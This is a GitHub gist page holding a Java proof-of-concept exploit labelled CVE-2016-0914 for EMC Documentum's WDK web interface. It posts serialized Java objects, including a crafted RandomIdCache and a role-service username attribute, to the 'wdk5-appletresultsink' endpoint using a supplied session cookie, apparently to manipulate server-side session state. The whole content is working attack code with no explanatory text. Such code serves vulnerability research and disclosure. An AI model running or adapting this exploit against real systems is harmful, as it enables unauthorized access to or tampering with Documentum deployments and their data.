Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import java.io.ObjectOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import com.documentum.web.security.RandomIdCache;
/**
* @author Andrey B. Panfilov <andrey@panfilov.tel>
*/
public class CVE20160914POC {
public static void main(String[] args) throws Exception {
String url = args[0];
String docbase = args[1];
String jsessionId = args[2];
sendRequest(url, jsessionId, docbase + ".dctm.roleService.username", docbase);
RandomIdCache cache = new RandomIdCache();
cache.put(String.valueOf(0), null);
sendRequest(url, jsessionId, "RandomIdCache", cache);
}
public static void sendRequest(String url, String jsessionId, Object... data) throws Exception {
HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
conn.setRequestProperty("Content-Type", "pwned");
conn.setRequestMethod("POST");
conn.setUseCaches(false);
conn.setDoOutput(true);
conn.setRequestProperty("Cookie", "JSESSIONID=" + jsessionId);
ObjectOutputStream oos = new ObjectOutputStream(conn.getOutputStream());
for (Object o : data) {
oos.writeObject(o);
}
oos.flush();
oos.close();
conn.connect();
System.out.println("Response code for " + url + " was: " + conn.getResponseCode());
}
public static String makeUrl(String url) {
if (!url.endsWith("/")) {
url += "/";
}
return url + "wdk5-appletresultsink";
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.